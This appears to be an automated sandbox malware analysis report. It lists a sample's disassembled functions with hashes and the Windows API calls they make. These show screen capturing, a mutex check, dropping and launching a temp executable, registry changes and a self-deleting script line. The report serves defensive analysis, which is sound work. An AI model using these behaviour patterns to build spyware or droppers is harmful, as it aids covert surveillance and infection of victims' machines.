                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 5fde6092dbaeb595df6386206e95cc36bec498aab372ae6033ef90cb0bf67f56
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 08c65c0034c77f162a5e2f762c8ff88aaa906a6fc17fd64b80a7c511c0c0ca56
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5fde6092dbaeb595df6386206e95cc36bec498aab372ae6033ef90cb0bf67f56
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A3F14B716142548FC314DF1DE89187B73E0BB8A301B460A2EF5C2D7392DB78EA1ADB56
                                                                                                                                                                                                                                                                                                                              Function 00431387 Relevance: .4, Instructions: 371COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 60a407b7035b458234a1b4ae8876206eb8531d1806f2b32c6b298a9738e91288
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 6072d2ab819a24c58290f472cacd0ace346509952e007a1e49c4d5c76d6a9cd3
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 60a407b7035b458234a1b4ae8876206eb8531d1806f2b32c6b298a9738e91288
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 90D1BF71A083558BC724DE29C88096FB7E4FF88354F442A2EF89597320EB38DD05CB86
                                                                                                                                                                                                                                                                                                                              Function 0041D081 Relevance: .3, Instructions: 276COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                                              • Opcode ID: e7326b31f45d4e50c8c50174bee11f9882207dfed74e31d12f4697374e1987de
                                                                                                                                                                                                                                                                                                                              • Instruction ID: b3ed2c0ab3c8a1cf02cd55a458d72155988f8fbc7d55d27d708debdf014431d3
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e7326b31f45d4e50c8c50174bee11f9882207dfed74e31d12f4697374e1987de
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AEB1A17951429A8ACB01EF68C4913F63BA1EF6A300F4850B9EC9CCF757D3398506EB24
                                                                                                                                                                                                                                                                                                                              Function 0043D0A8 Relevance: .2, Instructions: 237COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                                              • Opcode ID: dcaaf3a538fb6447e3283ddd15f45a67438a23807e0f4513107e056d33e47a72
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 9b9e3495b2600b5bb57a0f881f66ff577775c96cdfa749367535f2d08535ee8a
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dcaaf3a538fb6447e3283ddd15f45a67438a23807e0f4513107e056d33e47a72
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A3615871E0060867DE386928BC56BBF63A9EB4D304F14395BE883DB381C65DDD42835E
                                                                                                                                                                                                                                                                                                                              Function 0043C9ED Relevance: .2, Instructions: 214COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                                              • Opcode ID: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 1ecc17c6f396bdcf1bd7e257d91ac660bf1aa2674e3e23ad4d3769e79eae6022
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9751647160460D4BDB34EA6895E77BFA3899B0E344F18350BE582F7782C61DAD02939E
                                                                                                                                                                                                                                                                                                                              Function 10009AB0 Relevance: .2, Instructions: 204COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 38e53c6cfc7cb631d95e4ce9c5c01e1ef7a193c552409f515a30de06c8f2677d
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 07af33583a8a83ff99ca2172f1390c5359c3612c4c959e5766ab832e566f1312
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 38e53c6cfc7cb631d95e4ce9c5c01e1ef7a193c552409f515a30de06c8f2677d
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EE71F431A042858FFF15CF68C9817AEBFE1EF46290F19856DD8869B34AC734E845C761
                                                                                                                                                                                                                                                                                                                              Function 10009D20 Relevance: .2, Instructions: 202COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 0b9eeeb525da096657ebf3a7c1a5f77e6f05c971ae1611c1824229deae7698f9
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 0711c07a30d122a0ed161523b27e3c0cbd1b5143a9b7310719e51d773ed592eb
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0b9eeeb525da096657ebf3a7c1a5f77e6f05c971ae1611c1824229deae7698f9
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9F71D231B047858BEF15CE68C8803AEBBE1EF46290F19856DD885DB78AC734EC45C7A1
                                                                                                                                                                                                                                                                                                                              Function 00426FBD Relevance: .2, Instructions: 186COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                                              • Opcode ID: aab2813c665c480545fef87c0c14cb93031e59ded8cfa1b4e39f94410d0708d9
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 630ecb88457be3648657eb57e3c78cf78304789516621443522bf01dd35d6fbf
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aab2813c665c480545fef87c0c14cb93031e59ded8cfa1b4e39f94410d0708d9
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 81616F32A083159FC308DF75E581A5BB7E5BFCC718F450E1EF489DA151E634EA088B86
                                                                                                                                                                                                                                                                                                                              Function 1000B970 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 41d4b9db5622d712369f1408fb9efcee329c75454cb88c5cc876d862a952f1b9
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4B112B7774098243F680CD3ED9F45ABE7DAEFC63E1F29437AD2824B65CD22299459600
                                                                                                                                                                                                                                                                                                                              Function 00417FAF Relevance: 52.8, APIs: 29, Strings: 1, Instructions: 324windowmemoryCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417FC9
                                                                                                                                                                                                                                                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 00417FD4
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00418462: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418492
                                                                                                                                                                                                                                                                                                                              • CreateCompatibleBitmap.GDI32(?,00000000), ref: 00418055
                                                                                                                                                                                                                                                                                                                              • DeleteDC.GDI32(?), ref: 0041806D
                                                                                                                                                                                                                                                                                                                              • DeleteDC.GDI32(00000000), ref: 00418070
                                                                                                                                                                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 0041807B
                                                                                                                                                                                                                                                                                                                              • StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 004180A3
                                                                                                                                                                                                                                                                                                                              • GetCursorInfo.USER32(?), ref: 004180C5
                                                                                                                                                                                                                                                                                                                              • GetIconInfo.USER32(?,?), ref: 004180DB
                                                                                                                                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 0041810A
                                                                                                                                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 00418117
                                                                                                                                                                                                                                                                                                                              • DrawIcon.USER32(00000000,?,?,?), ref: 00418124
                                                                                                                                                                                                                                                                                                                              • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 00418154
                                                                                                                                                                                                                                                                                                                              • GetObjectA.GDI32(?,00000018,?), ref: 00418183
                                                                                                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000028), ref: 004181CC
                                                                                                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000001), ref: 004181EF
                                                                                                                                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000000,?), ref: 00418258
                                                                                                                                                                                                                                                                                                                              • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041827B
                                                                                                                                                                                                                                                                                                                              • DeleteDC.GDI32(?), ref: 0041828F
                                                                                                                                                                                                                                                                                                                              • DeleteDC.GDI32(00000000), ref: 00418292
                                                                                                                                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00418295
                                                                                                                                                                                                                                                                                                                              • GlobalFree.KERNEL32(00CC0020), ref: 004182A0
                                                                                                                                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00418354
                                                                                                                                                                                                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 0041835B
                                                                                                                                                                                                                                                                                                                              • DeleteDC.GDI32(?), ref: 0041836B
                                                                                                                                                                                                                                                                                                                              • DeleteDC.GDI32(00000000), ref: 00418376
                                                                                                                                                                                                                                                                                                                              • DeleteDC.GDI32(?), ref: 004183A8
                                                                                                                                                                                                                                                                                                                              • DeleteDC.GDI32(00000000), ref: 004183AB
                                                                                                                                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 004183B1
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconInfoLocal$BitmapBitsCursorDisplayDrawEnumSelectSettingsStretch
                                                                                                                                                                                                                                                                                                                              • String ID: DISPLAY
                                                                                                                                                                                                                                                                                                                              • API String ID: 1352755160-865373369
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 43547d2199591a7d456811b489c4e5e06da49d990eb38b88c81d72ae920930dd
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 6b2ada92df8522405a2cca839f58df11a8e30ba3d3d74bda048dad66fb1953bf
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 43547d2199591a7d456811b489c4e5e06da49d990eb38b88c81d72ae920930dd
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 39C17C71508344AFD3209F25DC44BABBBE9FF88751F04092EF989932A1DB34E945CB5A
                                                                                                                                                                                                                                                                                                                              Function 004112B5 Relevance: 43.9, APIs: 17, Strings: 8, Instructions: 189synchronizationsleepfileCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 004112D4
                                                                                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0041151D
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                                                                                                                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 0041135B
                                                                                                                                                                                                                                                                                                                              • OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
                                                                                                                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0041137C
                                                                                                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00411382
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004127D5: RegCloseKey.KERNEL32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                                                                                                                                                                                                                              • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 004113B3
                                                                                                                                                                                                                                                                                                                              • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0041140F
                                                                                                                                                                                                                                                                                                                              • GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
                                                                                                                                                                                                                                                                                                                              • lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041B59F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041B5FB
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041B59F: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041B60F
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041B59F: CloseHandle.KERNEL32(00000000), ref: 0041B61C
                                                                                                                                                                                                                                                                                                                              • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
                                                                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 004114C4
                                                                                                                                                                                                                                                                                                                              • OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004114D9
                                                                                                                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004114E4
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004114EB
                                                                                                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004114F1
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041B59F: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5DE
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
